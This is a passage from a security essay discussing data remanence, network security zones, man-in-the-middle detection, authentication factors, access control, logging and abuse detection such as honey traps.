medium), he trojans the BIOS. If you protect the BIOS, he trojans
the CPU. So you put a tamper-evident label on it, with your signature
on it, and check it every time. But he can install a keyboard logger.
So suppose you make a sealed box with everything in it, and connectors
on the front. Now he gets measurements and photos of your machine,
spends a fortune replicating it, replaces your system with an outwardly
identical one of his design (the trojan box), which communicates (say,
via encrypted spread-spectrum radio) to your real box. When you type
plaintext, it goes through his system, gets logged, and relayed to
your system as keystrokes. Since you talk plaintext, neither of you
are the wiser.
The physical layer is a common place to facilitate a side-channel
attack (see 21.2).
5.2 Data Remanence
Data remanence is the the residual physical representation of your
information on media after you believe that you have removed it (definition
thanks to Wikipedia, http://en.wikipedia.org/wiki/Data_remanence).
This is a disputed region of technology, with a great deal of speculation,
self-styled experts, but very little hard science.
As of 2006, the most definitive study seems to be the NIST Computer
Security Division paper Guidelines for Media Sanitization (http://csrc.nist.gov/publications/nistpubs/800-88/NISTSP800-88_rev1.pdf).
NIST is known to work with the NSA on some topics, and this may be
one of them. It introduces some useful terminology:
- disposing
- is the act of discarding media with no other considerations
- clearing
- is a level of media sanitization that resists anything
you could do at the keyboard or remotely, and usually involves overwriting
the data at least once
- purging
- is a process that protects against a laboratory attack
(signal processing equipment and specially trained personnel)
- destroying
- is the ultimate form of sanitization, and means that
the medium can no longer be used as originally intended
5.2.1 Magnetic Storage Media (Disks)
The seminal paper on this is Peter Gutmann's Secure Deletion
of Data from Magnetic and Solid-State Memory (http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html).
In early versions of his paper, he speculated that one could extract
data due to hysteresis effects even after a single overwrite, but
on subsequent revisions he stated that there was no evidence a single
overwrite was insufficient. Simson Garfinkel wrote about it recently
in his blog (https://www.techreview.com/blog/garfinkel/17567/).
The NIST paper has some interesting tidbits in it. Obviously, disposal
cannot protect confidentiality of unencrypted media. Clearing is probably
sufficient security for 99% of all data; I highly recommend Darik's
Boot and Nuke (http://dban.sourceforge.net/), which is a bootable
floppy or CD based on Linux. However, it cannot work if the storage
device stops working properly, and it does not overwrite sectors or
tracks marked bad and transparently relocated by the drive firmware.
With all ATA drives over 15GB, there is a "secure delete" ATA
command which can be accessed from hdparm within Linux, and Gordon
Hughes has some interesting documents and a Microsoft-based utility
(http://cmrr.ucsd.edu/people/Hughes/SecureErase.shtml). There's
a useful blog entry about it (http://storagemojo.com/2007/05/02/secure-erase-data-security-you-already-own/).
In the case of very damaged disks, you may have to resort to physical
destruction. However, with disk densities being what they are, even
1/125" of a disk platter may hold a full sector, and someone with
absurd amounts of money could theoretically extract small quantities
of data. Fortunately, nobody cares this much about your data.
Now, you may wonder what you can do about very damaged disks, or what
to do if the media isn't online (for example, you buried it in an
underground bunker), or if you have to get rid of the data fast. I
would suggest that encrypted storage (see 19.7)
would almost always be a good idea. If you use it, you merely have
to protect the confidentiality of the key, and if you can properly
sanitize the media, all the better. Recently Simson Garfinkel re-discovered
a technique for getting the data off broken drives; freezing them.
Another technique that I have used is to replace the logic board with
one from a working drive.
5.2.2 Semiconductor Storage (RAM)
Peter Gutmann's Data Remanence in Semiconductor Devices (http://www.cypherpunks.to/~peter/usenix01.pdf)
shows that if a particular value is held in RAM for extended periods
of time, various processes such as electromigration make permanent
changes to the semiconductor's structure. In some cases, it is possible
for the value to be "burned in" to the cell, such that it cannot
hold another value.
Recently a Princeton team (http://citp.princeton.edu/memory/)
found that the values held in DRAM decay in predictable ways after
power is removed, such that one can merely reboot the system and recover
keys for most encrypted storage systems (http://citp.princeton.edu/pub/coldboot.pdf).
This generated much talk in the industry. This prompted an interesting
overview of attacks against encrypted storage systems (http://www.news.com/8301-13578_3-9876060-38.html).
6 Distributed Systems
The objects involved in network security are called nodes.
One can talk about networks composed of humans (social networks),
but that's not the kind of network we're talking about here. Often
in network security the adversary is assumed to control the network;
this is a bit of a holdover from the days when the network was radio,
or when the node was an embassy in a country controlled by the adversary.
In modern practice, this doesn't seem to usually be the case, but
it'd be hard to know for sure. In network security we almost always
assume the adversary controls at least one of the nodes on the network.
In network security, we can lure an adversary to a system,
tempt them with something inviting; such a system is called a honeypot,
and a network of such systems is sometimes called a honeynet.
A honeypot may or may not be instrumented for careful monitoring;
sometimes systems so instrumented are called fishbowls, to
emphasize the transparent nature of activity within them. Often one
doesn't want to allow a honeypot to be used as a launch point for
attacks, so outbound network traffic is sanitized or scrubbed;
if traffic to other hosts is blocked completely, some people call
it a jail, but that is also the name of an operating system
security technology used by FreeBSD, so I consider it confusing.
To reduce a distributed system problem to a physical security (see
5) problem, you can use an air gap,
or sneakernet between one system and another. However, the
data you transport between them may be capable of exploiting the offline
system. One could keep a machine offline except during certain windows;
this could be as simple as a cron job which turns on or off the network
interface via ifconfig. However, an offline system may be difficult
to administer, or keep up-to-date with security patches.
6.1 Cryptography is the Sine Qua Non of Secure Distributed Systems
All cryptography lets you do is create trust relationships across
untrustworthy media; the problem is still trust between endpoints
and transitive trust.
- Marcus Ranum
Put simply, you can't have a secure distributed system (with the normal
assumptions of untrusted nodes and network links potentially controlled
by the adversary) without using cryptography somewhere ("sine
qua non" is Latin for "without which it could not be"). If
the adversary can read communications, then to protect the confidentiality
of the network traffic, it must be encrypted. If the adversary can
modify network communication, then it must have its integrity protected
and be authenticated (that is, to have the source identified). Even
physical layer communication security technologies, like the KLJN
cipher, quantum cryptography, and spread-spectrum communication, use
cryptography in one way or another.
I would go farther and say that performing network security decisions
on anything other than cryptographic keys is never going to be as
strong as if it depended on cryptography. Very few Internet adversaries
currently have the capability to arbitrarily route data around. Most
cannot jump between VLANs on a tagged port. Some don't even have the
capability to sniff on their LAN. But none of the mechanisms preventing
this are stronger than strong cryptography, and often they are much
weaker, possibly only security through obscurity. Let me put it to
you this way; to support a general argument otherwise, think about
how much assurance a firewall has that a packet claiming to be from
a given IP address is actually from the system the firewall maintainer
believes it to be. Often these things are complex, and way beyond
his control. However, it would be totally reasonable to filter on
IP address first, and only then allow a cryptographic check; this
makes it resistant to resource consumption attacks from anyone who
cannot spoof a legitimate IP address (see 3.2.1).
6.2 Hello, My Name is 192.168.1.1
Humans are incapable of securely storing high-quality cryptographic
keys, and they have unacceptable speed and accuracy when performing
cryptographic operations. (They are also large, expensive to maintain,
difficult to manage, and they pollute the environment. It is astonishing
that these devices continue to be manufactured and deployed. But they
are sufficiently pervasive that we must design our protocols around
their limitations).
- Network Security / PRIVATE Communication in a PUBLIC World by Charlie
Kaufman, Radia Perlman, & Mike Speciner (Prentice Hall 2002; p.237)
Because humans communicate in slowly, in plaintext, and don't plug
into a network, we consider the nodes within the network to be computing
devices. The system a person interacts with has equivalency with them;
break into the system administrator's console, and you have access
to anything he or she accesses. In some cases, you may have access
to anything he or she can access. You may think that the your LDAP
or Kerberos server is the most important, but isn't the node of the
guy who administers it just as critical? This is especially true if
OS security is weak and any user can control the system, or if the
administrator is not trusted, but it is also convenient because packets
do not have user names, just source IPs. When some remote system connects
to a server, unless both are under the control of the same entity,
the server has no reason to trust the remote system's claim about
who is using it, nor does it have any reason to treat one user on
the remote system different than any other.
6.3 Source Tapping; The First Hop and Last Mile
One can learn a lot more about a target by observing the first link
from them than from some more remote place. That is, the best vantage
point is one closest to the target. For this reason, the first hop
is far more critical than any other. An exception may involve a target
that is more network-mobile than the eavesdropper. The more common
exception is tunneling/encryption (to include tor and VPN technologies);
these relocate the first hop somewhere else which is not physically
proximate to the target's meat space coordinates, which may make it
more difficult to locate.
Things to consider here involve the difficulty of interception, which
is a secondary concern (it is never all that difficult). For example,
it is probably less confidential from the ISP to use an ISP's caching
proxy than to access the service directly, since most proxy software
makes it trivial to log the connection and content; however, one should
not assume that one is safe by not using the proxy (especially now
that many do transparent proxying). However, it is less anonymous
from the remote site to access the remote site directly; using the
ISP's proxy affords some anonymity (unless the remote site colludes
with the ISP).
6.4 Security Zones
The firewall was originally defined as a device between different
networks that had different security characteristics; it was named
after the barrier between a car interior and the engine, which is
designed to prevent a engine fire from spreading to the cabin. Demilitarized
zones (DMZs) were originally defined as an area outside the firewall
but inside a border router, then as a separate leg of the firewall,
and now in a variety of ways. An untrusted network may be the
Internet, or a wifi network, or a network with public access. What
these definitions all have in common is that they define a security
zone (this term thanks to the authors of Extreme Exploits),
or the barrier between security zones. I believe this concept, that
of a security zone where all the nodes inside have roughly equivalent
access to or from other security zones, is the most important and
fundamental way of thinking of network security. Do not confuse this
with the idea that all the systems in the zone have the same relevance
to the network's security, or that the systems have the same impact
if compromised (for example, your site's DNS servers may be in the
same zone as desktops); that is a complication and more of a matter
of operating system security than network security.
6.5 Security Equivalent Things Go Together
One issue that always seems to come up is availability versus other
goals. For example, suppose you install a new biometric voice recognition
system. Then you have a cold and can't get in. Did you prioritize
correctly? Which is more important? Similar issues come up in almost
every place with regard to security. For example, your system may
authenticate users versus a global server, or it may have a local
database for authentication. The former means that one can revoke
a user's credentials globally immediately, but also means that if
the global server is down, nobody can authenticate. Attempts to get
the best of both worlds ("authenticate locally if global server
is unreachable") often reduce to availability (adversary just DOSes
link between system and global server to force local authentication).
My philosophy on this is simple; put like things together. That is,
I think authentication information for a system should be on the system.
That way, the system is essentially a self-contained unit. By spreading
the data out, one multiplies potential attack targets, and reduces
availability. If someone can hack the local system, then being able
to alter a local authentication database is relatively insignificant.
6.6 Outsider Threats vs. Insider Threats
The perimeter is not here nor there, but it is inside you, and among
you.
Most organizations consider the unauthenticated and unauthorized person
on the Internet to be the largest threat, and despite hype to the
contrary, I believe this is correct. Most people are trustworthy for
the sorts of things we trust them for, and if they weren't, society
would probably collapse. The difference is that on the Internet, the
pool of potential adversaries is much larger, and while a person can
only hold one job, they can easily hack into many different organizations.
The veterans (and critics) of Usenet and IRC are well aware of this,
where the unbalanced tend to be most vocal and most annoying. Some
of them seem to have no goal other than to irritate others. In the
real world, people learn to avoid these sorts, and employers choose
not to hire them, but on the Internet, it's a bit more difficult to
filter out the chaff, so to speak. Also, if we detect a misbehaving
insider, we can usually identify and therefore punish them; by contrast,
it is difficult to take a simple IP address and end up with a successful
lawsuit or criminal case, particularly if the IP is in another country.
Essentially, perimeter defenses protect against most adversaries,
whereas distributed defenses on each host protect against all adversaries
(that is, remote systems; local users are the domain of OS security).
The idea of pointing outward versus pointing inward is a well-known
one in alarm systems. Your typical door and window sensors are perimeter
defenses, and the typical motion detector or pressure mat an internal
defense. As with alarm systems, the internally-focused defenses are
prone to triggering on authorized activity, whereas the perimeter
defenses are less so.
However, I am beginning to think that perimeter defenses are insufficient.
As we become more networked, we will have more borders with more systems.
End-to-end protocol encryption and VPNs prevent any sort of application-layer
data inspection by NIDS devices located at choke points and gateways.
High-speed networks, particularly fiber to the desktop, challenge
our ability to centralize, inspect, and filter traffic, and requires
expensive, high-performance equipment. Tunneling and firewall-penetrating
technologies like skype create tunnels (some may say covert channels)
through the firewall. Put simply, "the perimeter is everywhere",
and the forward-looking should consider how to distribute our security
over our assets. For example, everything that is done by a NIDS can
be done on the endpoint, and it doesn't suffer from many of the typical
problems that a separate device does (including evasion techniques
and interpretation ambiguities). Also, this means each internal node
pays for its own security; if I am downloading 1Gbps, I am also inspecting
it, whereas an idle system isn't spending any cycles inspecting traffic.
With the proper design, no packets get lost, dropped, or ignored,
nor is it necessary to limit bandwidth because of limited inspection
capacity at the perimeter. And we can use commodity hardware (the
hardware we already have) to do the work.
Another important issue to consider is series versus parallel defenses
(see 24.8). Suppose the gateway, firewall, and
VPN endpoint for your organization's main office uses the pf firewall
(IMHO, the best open-source firewall out there). Now, suppose a remote
office wants to connect in from Linux, so they use iptables. Now,
should there be an exploitable weakness in iptables, then they might
be able to penetrate the remote office, making them inside the perimeter.
Courtesy of the VPN tunnel, they are now inside the perimeter of the
main office as well, and your perimeter security is worthless. Given
the trend towards a more complex and convoluted perimeter, I think
this suggests moving away from perimeter defenses and towards distributed
defenses; we can start by creating concentric perimeters, or firewalls
between internal networks, and move towards (the ideal but probably
unreachable goal of) a packet filter on every machine, implementing
least privilege on every system.
A hardware security module (HSM) basically makes everyone but the
vendor an outsider; insurance companies love this because they defend
against insider threats as well as outsiders.
Dave G. of Matasano has published an interesting piece on the insider
threat (http://www.matasano.com/log/984/the-insidious-insider-threat/).
6.7 A Proposed Perimeter Defense
I believe the following design would be a useful design for perimeter
defenses for most organizations and individuals. First, there would
be an outer layer of reactive prevention, followed by an inner layer
of prevention and detection that acts as a fail-safe mechanism. If
the outer preventative defense should fail for some reason (hardware,
software, configuration) then incoming connections will be stopped
by the inner layer and the detection will notify us that something
is wrong. The idea of a dual layer of firewalling is already becoming
popular with financial institutions and military networks, but really
derives itself from the lessons learned trying to guarantee high availability
and specifically the goal of eliminating single points of failure.
This system also doesn't require monitoring traffic blocked by the
outer layer, which virtually eliminates the resources it takes to
monitor traffic that gets blocked anyway. However, if the outer layer
were not reactive, then we would effectively be discarding any useful
intelligence that is gained by detecting probes (that is, a failed
connection or attack is still valuable in determining intent).
With a reactive firewall as the outer layer, when an adversary probes
our defenses looking for holes or weak spots, we take appropriate
action, usually shunning that network address, and this makes enumeration
a much more difficult process. With a little imagination, we can construct
more deceptive defensive measures, like returning random responses,
or redirection to a honey-net (which is essentially just a consistent
set of bogus responses, plus monitoring). Since enumeration is strictly
an information-gathering activity, the obvious countermeasure is deception.
The range of deceptive responses runs from none (that is, complete
silence, or lack of information) through random responses (misinformation)
to consistent, strategic deception (disinformation). Stronger responses
are out of proportion to the provocation (network scans are legal
in most countries), and often illegal in any circumstances.
6.8 Man In The Middle
How do we detect MITM or impersonation in web, PGP/GPG, SSH contexts?
The typical process for creating a connection involves a DNS resolution
at the application layer (unless you use IP addresses), then sending
packets to the IP address (at the network layer), which have to be
routed; at the link layer, ARP typically is used to find the next
hop at each stage.
6.8.1 DNS Issues
Poisoning, spoofing (transaction ID issues) or maybe you are querying
a DNS server the adversary controls (i.e. your ISP)
6.8.2 IP Routing
Announcing bogus routes, or topological considerations
6.8.3 Link-layer Issues
ARP poisoning (dsniff)
6.8.4 Physical Layer
Tapping the wire (or listening to wireless)
6.8.5 Periodic Rechecking
It's difficult to stay perpetually in the middle. When you aren't,
typically, the cryptographic fingerprints will no longer match and
the MITM will be detected. It's handy to occasionally compare them
using different channels, so that if the ones you originally relied
upon were proxied, the tampering will be detected. SSH does this automatically
and is called the baby duck model (i.e. it bonds to the first
thing it sees, and complains if it changes identities). However, this
detects the problem only retroactively.
6.8.6 Out-of-Band Comparison
One can compare digests/fingerprints/hashes over a different, low-bandwidth
communication medium (i.e. the phone, postal mail).
6.8.7 Parallel Paths
OOB comparison is really an example of creating two disjoint paths
between two entities and making sure that they give the same results.
This can occur in multiple contexts. For example, it can be used for
the bootstrapping problem; how can I trust the first connection? By
creating two paths I can compare the identities of the peer both places.
I once used this to check the integrity of my PGP downloads by downloading
it from home and from another location, and comparing the results.
TODO: show a diagram of what I mean here.
6.8.8 Formatting
Imagine that the adversary is conducting a MITM against, say, an SSH
session, so instead of A<->B it is A<->O<->B. Your countermeasure
as A may be to check the IP addresses of the peer at B, so that the
adversary would have to spoof IPs in both directions (this is often
printed automatically at login). Another technique is to check the
host key fingerprint as part of your login sequence, sending the fingerprint
through the tunneled connection. The adversary may modify the data
at the application layer automatically, to change the fingerprint
on the way through. But what if you transformed (e.g. encrypted) the
fingerprint using a command-line tool, and represented it as printable
characters, and printed them through the tunnel, and inverted the
transformation at the local end? Then he'd have a very difficult time
writing a program to detect this, especially if you kept the exact
mechanism a secret. You could run the program automatically through
ssh, so it isn't stored on the remote system.
7 Identification and Authentication
Identification is necessary before making any sort of access control
decisions. Often it can reduce abuse, because an identified individual
knows that if they do something there can be consequences or sanctions.
For example, if an employee abuses the corporate network, they may
find themselves on the receiving end of the sysadmin's luser attitude
readjustment tool (LART). I tend to think of authentication as a process
you perform on objects (like paintings, antiques, and digitally signed
documents), and identification as a process that subjects (people)
perform, but in network security you're really looking at data created
by a person for the purpose of identifying them, so I use them interchangeably.
7.1 Identity
Sometimes I suspect I'm not who I think I am.
- Ghost in the Shell
An identity, for our purposes, is an abstract concept; it does
not map to a person, it maps to a persona. Some people call
this a digital ID, but since this paper doesn't talk about
non-digital identities, I'm dropping the qualifier. Identities are
different from credentials, which are something you use to
prove identity. For example, your login password is a credential.
In relational database design, it is considered a good practice for
the primary key (http://en.wikipedia.org/wiki/Primary_key)
of a table to be an integer, perhaps a row number, that is not used
for anything else. That is because the primary key is used as an identifier
for the row. An identifier is shorthand, a handle; like a pointer,
it allows us to modify the object itself, so that the modification
occurs in all places simultaneously. Most competent DBAs realize that
people change names, phone numbers, locations, and so on; they may
even change social security numbers. They also realize that people
may share any of these things (even social security numbers are not
necessarily unique, especially if they lie about it). So to be able
to identify a person across any of these changes, you need to use
a row number. The exact same principle applies with security systems.
In Unix, a person is given a username (identity) and a password (credential).
This is good, because the password may be changed without losing the
idea of the identity of the person. However, there are subtle gotchas.
In actuality, the username is mapped to a user ID (UID), which is
the real way that Unix keeps track of identity. It isn't necessarily
a one-to-one mapping. Also, a poor system administer may reassign
an unused user ID without going through the file system and looking
for files owned by the old user, in which case their ownership is
silently reassigned.
PGP and GPG made the mistake of using a cryptographic key as an identifier.
If one has to revoke that key, one basically loses anything (such
as signatures) which applied to that key, and the trust that other
people have indicated towards that key. And if you have multiple keys,
friends of yours who have all of them cannot treat them all as equivalent,
since GPG can't be told that they are associated to the same identity,
because the keys are the identity. Instead, they must manage
statements about you (such as how much they trust you to act as an
introducer) on each key independently.
7.2 What Authority?
Does it follow that I reject all authority? Far from me such a thought.
In the matter of boots, I refer to the authority of the bootmaker;
concerning houses, canals, or railroads, I consult that of the architect
or the engineer.
- Mikhail Bakunin, What is Authority? 1882 (http://www.panarchy.org/bakunin/authority.1871.html)
When we are attempting to identify someone, we are relying upon some
authority, usually the state government. When you register a domain
name with a registrar, they record your personal information in the
WHOIS database; this is the system of record (http://en.wikipedia.org/wiki/System_of_record).
No matter how careful we are, we can never have a higher level of
assurance than this authority has. If the government gave that person
a false identity, or the person bribed a DMV clerk to do so, we can
do absolutely nothing about it. This is an important implication of
the limitations of accuracy (see 3.7).
7.3 Authentication Factors
There are many ways you can prove your identity to a system. They
may include:
- something you are
- like biometric signatures such as the pattern
of capillaries on your retina, your fingerprints, etc.
- something you have
- like a token, physical key, or thumb drive
- something you know
- like a passphrase or password
- somewhere you are
- if you put a GPS device in a computer, or
did direction-finding on transmissions, or simply require a person
to be physically present somewhere to operate the system
- somewhere you can be reached
- like a mailing address, network
address, email address, or phone number
At the risk of self-promotion, I want to point out that, to my knowledge,
the last factor has not been explicitly stated in computer security
literature, although it is demonstrated every time a web site emails
you your password, or every time a financial company mails something
to your home.
7.4 Authentication Issues: When, What
Do we authenticate each transaction or command (sudo), or a session
(SSH), or only certain commands (passwd)? What is being authenticated,
the remote system, the agent, or the user?
7.5 The Identity Continuum
Identification can range from fully anonymous to pseudonymous, to
full identification. Ensuring identity can be expensive, and is never
perfect. Think about what you are trying to accomplish. Applies to
cookies from web sites, email addresses, "real names", and so
on.
7.6 Problems Remaining Anonymous
In cyberspace everyone will be anonymous for 15 minutes.
- Graham Greenleaf
What can we learn from anonymizer, mixmaster, tor, and so on? Often
one can de-anonymize. Some people have de-anonymized search queries
this way, and census data, and many more data sets that are supposed
to be anonymous.
7.7 Problems with Identifying People
- Randomly-Chosen Identity
- Fictitious Identity
- Stolen Identity
7.8 Remote Attestation
A concept in network security involves knowing that the remote system
is a particular program or piece of hardware is called remote
attestation. When I connect securely over the network to a machine
I believe I have full privileges on, how do I know I'm actually talking
to the machine, and not a similar system controlled by the adversary?
This is usually attempted by hiding an encryption key in some tamper-proof
part of the system, but is vulnerable to all kinds of disclosure and
side-channel attacks, especially if the owner of the remote system
is the adversary.
The most successful example seems to be the satellite television industry,
where they embed cryptographic and software secrets in an inexpensive
smart card with restricted availability, and change them frequently
enough that the resources required to reverse engineer each new card
exceeds the cost of the data it is protecting. In the satellite TV
industry, there's something they call ECMs (electronic counter-measures),
which are program updates of the form "look at memory location
0xFC, and if it's not 0xFA, then HCF" (Halt and Catch Fire). The
obvious crack is to simply remove that part of the code, but then
you will trigger another check that looks at the code for the first
check, and so on.
The sorts of non-cryptographic self-checks they request the card to
do, such as computing a checksum (such as a CRC) over some memory
locations, are similar to the sorts of protections against reverse
engineering, where the program computes a checksum to detect modifications
to itself.
8 Access Control
8.1 Privilege Escalation
Ideally, all services would be impossible to abuse. Since this is
difficult or impossible, we often restrict access to them, to limit
the potential pool of adversaries. Of course, if some users can do
some things and others can't, this creates the opportunity for the
adversary to perform an unauthorized action, but that's often unavoidable.
For example, you probably want to be able to do things to your computer,
like reformat it and install a new operating system, that you wouldn't
want others to do. You will want your employees to do things an anonymous
Internet user cannot (see 3.4). Thus, many
adversaries want to escalate their privileges to that of some more
powerful user, possibly you. Generally, privilege escalation
attacks refer to techniques that require some level of access above
that of an anonymous remote system, but grant an even higher level
of access, bypassing access controls.
8.2 Physical Access Control
These include locks. I like Medeco, but none are perfect. It's easy
to find guides to lock picking:
8.3 Operating System Access Control: DAC, MAC, RBAC
Discretionary Access Control (DAC) is up to the end-user. They
can choose to let other people write to their files, if they wish,
and the defaults tend to be global. This is how file permissions on
classic Unix and Windows works. A more secure system often involves
Mandatory Access Control (MAC), where the security administrator
sets up the permissions globally. Some MAC types are Type Enforcement
and Domain Type Enforcement. Implementations include SELinux and systrace.
Often they are combined, where the access request has to pass both
tests, meaning that the effective permission set is the intersection
(union) of the MAC and DAC permissions. Another way of looking at
it is that MAC sets the maximum permissions that DAC can give. Role-Based
Access Control (RBAC) could be considered a form of MAC. In RBAC,
there are roles to whom permissions are assigned, and one switches
roles to change permission sets. For example, you might have a security
administrator role, but you don't need that to read email or surf
the web, so you only switch to it when doing security administrator
stuff. This prevents you from accidentally running malware with full
permissions. Unix emulates this with pseudo-users and sudo.
9 Secure System Administration
9.1 Change Management
Change management is the combination of both pro-active declaring
and approving of intended changes, and retroactively monitoring the
system for changes, comparing them to the approved changes, and altering
and escalating any unapproved changes. Change management is based
on the theory that unapproved changes are potentially bad, and therefore
related to anomaly detection (see 12.1). It
is normally applied to files and databases.
9.2 Self-Healing Systems
There is a system administration tool called cfengine (http://www.cfengine.org/)
which implements a concept called "self-healing systems", whereby
any changes made on a given machine are automatically reverted to
the (ostensibly correct and secure) state periodically. Any change
to these parameters made on a given system but not in the central
configuration file are considered to be accidents or attacks, and
so if you really want to make a change it has to be done on the centrally-managed
and ostensibly monitored configuration file. You can also implement
similar concepts by using a tool like rsync to manage the contents
of part of the file system.
9.3 Heterogeneous vs. Homogeneous Defenses
Often homogeneous solutions are easier to administer. Having different
systems requires more resources, in training yourself, learning to
use them properly, keeping up with vulnerabilities, and increases
the risk of misconfiguration (assuming you aren't as good at N systems
as you would be at one). But there are cases where heterogeneity is
easier, or where homogeneity is impossible. Maybe a particular OS
you're installing comes with sendmail as the default, and changing
it leads to headaches (or the one you want just isn't available on
it, because it is a proprietary platform). Embedded devices often
have a fixed TCP/IP stack that can't be changed, so if you are to
guard against things like such things, you must either run only one
kind of software on all Internet-enabled systems, denying yourself
the convenience of all the new network-enabled devices, or you must
break Internet-level connectivity with a firewall and admit impotency
to defend against internal threats (and anyone who can bypass the
perimeter).
10 Logging
10.1 Synchronized Time
It is absolutely vital that your systems have consistent timestamps.
Consistency is more important than accuracy, because you are primarily
going to be comparing logs between your systems. There are a number
of problems comparing timestamps with other systems, including time
zones and the fact that their clocks may be skewed. However, ideally,
you'd want both, so that you could compare if the other systems are
accurate, and so you can make it easier for others to compare their
logs with yours. Thus, the Network Time Protocol (NTP) is vital. My
suggestion is to have one system at every physical location that act
as NTP servers for the location, so that if the network connections
go down, the site remains consistent. They should all feed into one
server for your administrative domain, and that should connect with
numerous time servers. This also minimizes network traffic and having
a nearby server is almost always better for reducing jitter.
See the SAGE booklet on "Building a Logging Infrastructure".
11 Reports
11.1 Change Reporting
I spend a lot of time reading the same things over and over in security
reports. I'd like to be able to filter things that I decided were
okay last time without tweaking every single security reporting script.
What I want is something that will let me see the changes from day
to day. Ideally, I'd be able to review the complete data, but normally
I read the reports every day and only want to know what has changed
from one day to the next.
11.2 Artificial Ignorance
To be able to specify things that I want to ignore in reports is what
perhaps Marcus Ranum termed "artificial ignorance" back around
1994 (described here: http://www.ranum.com/security/computer_security/papers/ai/index.html).
Instead of specifying what I want to see, which is akin to misuse
detection, I want to see anything I haven't already said was okay,
which is anomaly detection. Put another way, what you don't know can
hurt you (see 22.6), which is why "default deny"
is usually a safer access control strategy (see 24.1).
11.3 Dead Man's Switch
In some movies, a character has a switch which goes off if they die,
which is known as a dead man's switch, which can be applied
to software (http://en.wikipedia.org/wiki/Dead_man's_switch#Software_uses)
I want to see if some subsystem has not reported in. If an
adversary overtly disables our system, we are aware that it has been
disabled, and we can assume that something security-relevant occurred
during that time. But if through some oversight on our side, we allow
a system to stop monitoring something, we do not know if anything
has occurred during that time. Therefore, we must be vigilant that
our systems are always monitoring, to avoid that sort of ambiguity.
Therefore, we want to know if they are not reporting because of a
misconfiguration or failure. Therefore, we need a periodic heartbeat
or system test, and a dead man's switch.
12 Abuse Detection
Doveriai, no proveriai ("trust, but verify")
- Russian Proverb (http://en.wikipedia.org/wiki/Trust,_but_Verify)
It is becoming apparent that there's more to computers than shell
access nowadays. One wants to allow benign email, and stop unsolicited
bulk email. For wikis and blogs, one wants to allow collaboration,
but doesn't want "comment spam". Some still want to read topical
USENET messages, and not read spam (I feel that's a lost cause now).
If you're an ISP, you want to allow customers to do some things but
don't want them spamming or hacking. If you have a public wifi hot-spot,
you'd like people to use it but not abuse it. So I generalized IDS,
anti-virus, and anti-spam as abuse detection.
12.1 Misuse Detection vs. Anomaly Detection
Most intrusion detection systems categorize behavior, making it an
instance of the classification problem (see 3.2).
Generally, there are two kinds of intrusion detection systems, commonly
called misuse detection and anomaly detection. Misuse
detection involves products with signature databases which
indicate bad behavior. By analogy, this is like a cop who is told
to look for guys in white-and-black striped jumpsuits with burlap
sacks with dollar signs printed on them. This is how physical alarm
sensors work; they detect the separation of two objects, or the breaking
of a piece of glass, or some specific thing. The second is called
anomaly detection, which is like a cop who is told to look for "anything
out of the ordinary". The first has more false negatives and fewer
false positives than the second. The first (theoretically) only finds
security-relevant events, whereas the second (theoretically) notes
any major changes. This can play out in operating system security
(as anti-virus and other anti-malware products) or in network security
(as NIDS/IPS). The first is great for vendors; they get to sell you
a subscription to the signature database. The second is virtually
non-existent and probably rather limited in practice (you have to
decide what to measure/quantify in the first place).
In misuse detection, you need to have a good idea of what the adversary
is after, or how they may operate. If you get this guess wrong, your
signature may be completely ineffective; it may minimize false positives
at the risk of false negatives, particularly if the adversary is actually
a script that isn't smart enough to take the bait. In this sense,
misuse detection is a kind of enumerating badness, which means
anything not specifically listed is allowed, and therefore violates
the principle of least privilege (see 24.1).
12.2 Honey Traps
Tart words make no friends; a spoonful of honey will catch more flies
than a gallon of vinegar.
- Benjamin Franklin
Noted security expert Marcus Ranum gave a talk on burglar alarms once
at Usenix Security, and had a lesson that applies to computer security.
He said that when a customer of theirs had an alarm sensor that was
disguised as a jewelry container or a gun cabinet, it was almost always
sure to trick the burglar, and trigger the alarm. Criminals, by and
large, are opportunistic, and when something valuable is offered to
them, they rarely look a gift horse in the mouth. I also recall a
sting operation where a law enforcement agency had a list of criminals
they wanted to locate but who never seemed to be home. They sent winning
sweepstakes tickets to wanted criminals who dutifully showed up to
claim their "prize". So a honey trap may well be the cheapest
and most effective misuse detection mechanism you can employ.
One of the ways to detect spam is to have an email address which should
never receive any email; if any email is received, then it is from
a spammer. These are called spamtraps. Unix systems may have
user accounts which may have guessable passwords and no actual owners,
so they should never have any legitimate logins. I've also heard of
banks which have trap accounts; these tend to be large accounts
which should never have a legitimate transaction; they exist on paper
only. Any transaction on such an account is, by definition, fraudulent
and a sign of a compromised system. One could even go farther and
define a profile of transactions, possibly pseudo-random, any deviation
from which is considered very important to investigate. The advantage
of these types of traps are the extremely low false-positive rate,
and as a deterrent to potential adversaries who fear being caught
and punished.
12.3 Tripwires and Booby Traps
Other misuse detection methods involve detecting some common activity
after the intrusion, such as fetching additional tools (outbound TFTP
connections to servers in Eastern Europe are not usually authorized)
or connecting back to the adversary's system to bypass ingress rules
on the firewall (e.g. shoveling application output to a remote X server).
Marcus Ranum once recompiled "ls" to shut down the system if
it was run as root, and he learned to habitually use "echo *"
instead. One may wish to check that it has a controlling tty as well,
so that root-owned scripts do not set it off. In fact, having a root-owned
shell with no controlling tty may be an event worth logging.
12.4 Anti-Malware
This includes anti-virus, anti-trojan, anti-spyware, etc.
12.5 Anti-Spam
There's content filtering (including Bayesian filtering, and signature-based
algorithms), delays of various kinds (graylisting), resource-consumption
responses (teergrubing), blacklisting, micro-payment schemes, SPF,
DKIM, and so on.
12.6 Detecting Automated Peers
People who abuse things for money want to do a lot of it, so frequently
you'll want to try to detect them. You could be doing this for any
of a number of reasons:
- To prevent people from harvesting email addresses for spamming
- To prevent bots from defacing your wiki with links to unrelated sites
- To prevent password-guessing
Related links:
A CAPTCHA is a Completely Automated Turing test to tell Computers
and Humans Apart (http://en.wikipedia.org/wiki/Captcha). Basically
they are problems whose answers are known and which are difficult
for computers to answer directly.
If you want to stop people from spidering your web site, you may use
something called a "bot trap". This is similar to a CAPTCHA
in that it tries to lure bots into identifying themselves by exploiting
a behavior difference from humans.
12.6.3 Velocity Checks
This is an application of anomaly detection to differentiate computers
and humans, or to differentiate between use and abuse. You simply
look at how many transactions they are doing. You can take a baseline
of what you think a human can do, and trigger any time an entity exceeds
this. Or, you can profile each entity and trigger if they exceed their
normal statistical profile, possibly applying machine learning algorithms
to adjust expectations over time.
12.6.4 Typing Mistakes
The kojoney honey pot (http://kojoney.sourceforge.net/) emulates
an SSH server in order to gather intelligence against adversaries.
